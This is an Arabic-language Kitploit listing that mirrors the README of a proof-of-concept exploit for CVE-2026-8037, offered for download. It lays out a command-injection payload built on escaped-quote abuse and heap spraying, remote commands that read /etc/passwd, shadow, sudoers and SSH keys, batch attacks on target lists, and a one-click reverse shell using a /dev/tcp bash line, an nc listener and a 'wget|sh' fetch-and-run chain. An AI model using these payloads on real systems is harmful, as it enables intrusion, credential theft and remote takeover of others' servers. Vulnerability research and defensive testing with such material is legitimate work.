Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-8037-POC — يشمل اكتشاف الأوامر القابلة للتنفيذ و getshell بنقرة واحدة (يتطلب نشر خدمة على الخادم) | Kitploit
أدوات/GitHubGitHub/caster-chen/cve-2026-8037-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

يشمل اكتشاف الأوامر القابلة للتنفيذ و getshell بنقرة واحدة (يتطلب نشر خدمة على الخادم)

عرض المستودع
3منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-8037-POC

يشمل اكتشاف الأوامر القابلة للتنفيذ و getShell بنقرة واحدة (يتطلب نشر خدمة على الخادم) يمكن استخدام pco.yaml مع nuclei للاكتشاف السريع

البدء السريع

الوضع التفاعلي

root@kitploit:~
python go.py

أدخل عنوان URL الهدف ← اختر قائمة الوظائف.

اكتشاف الهدف

root@kitploit:~
# اكتشاف سريع (8 معلومات أساسية)
python go.py -t https://IP:PORT --probe fast

# اكتشاف عميق (جميع الأوامر: 30+ عنصر)
python go.py -t https://IP:PORT --probe deep

# اكتشاف دفعة
python go.py -f vulnerable_targets.txt --probe fast

تنفيذ الأوامر

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname" python go.py -t https://IP:PORT -c "ls -la /root" python go.py -t https://IP:PORT -c "cat /etc/passwd" # دفعة متزامنة (20 خيط) python go.py -f targets.txt -c "hostname" --batch 20

إعادة القشرة بنقرة واحدة

افتح محطتين على جهاز الهجوم:

root@kitploit:~
# المحطة 1 - خدمة HTTP (توفر rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# المحطة 2 - انتظار الارتداد
nc -lvnp 8088

ثم أرسل الحمولة:

root@kitploit:~
# هدف مفرد
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# دفعة (تسلسلي، يمكن استقبال واحد فقط في كل مرة)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

سيقوم السكريبت بطباعة خطوات التحضير قبل الإرسال.


محتوى الاكتشاف العميق

الفئةالأمر
معلومات أساسيةhostname, uname -a, kernel, OS release, uptime
مستخدمونid, whoami, users/w/who
شبكةifconfig, route, arp, listening ports, connections, iptables
نظامprocesses, cpuinfo, meminfo, disk, mount
ملفاتls / /root /tmp /home /etc
إعداداتcrontab, passwd, shadow, sudoers, SSH keys
إضافاتconfig search, scripts, docker, containers

مبدأ الحقن

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <الأمر> #", ...}
  • apiuser="''''" يُؤدي إلى ثغرة عدم إنهاء escape_quotes() بقيمة null
  • g0~g60 رش الكومة 61 مرة لزيادة نسبة النجاح
  • '; <الأمر> # يُغلق السياق، و# يُعلق ما يليه

حد الطول

بدون استخدام echo tag يُمكن استخدام 34 حرفًا:

root@kitploit:~
wget -O- IP:PORT|sh    (31 حرفًا)

سلسلة الأنابيب: wget تحميل → sh تنفيذ → bash ارتداد إلى المنفذ المحدد.


نظرة على المعاملات

المعاملالوظيفة
-t, --target URLعنوان الهدف
-f, --file FILEملف قائمة الأهداف
-l, --lhost IPعنوان IP لجهاز الهجوم
-p, --lport PORTمنفذ خدمة HTTP (الافتراضي 8087)
-n, --ncport PORTمنفذ استماع nc (الافتراضي 8088)
-c, --cmd CMDتنفيذ الأمر
--probe fast/deepاكتشاف سريع/عميق
--batch Nعدد المهام المتزامنة (الافتراضي تسلسلي)
تنزيل الأداة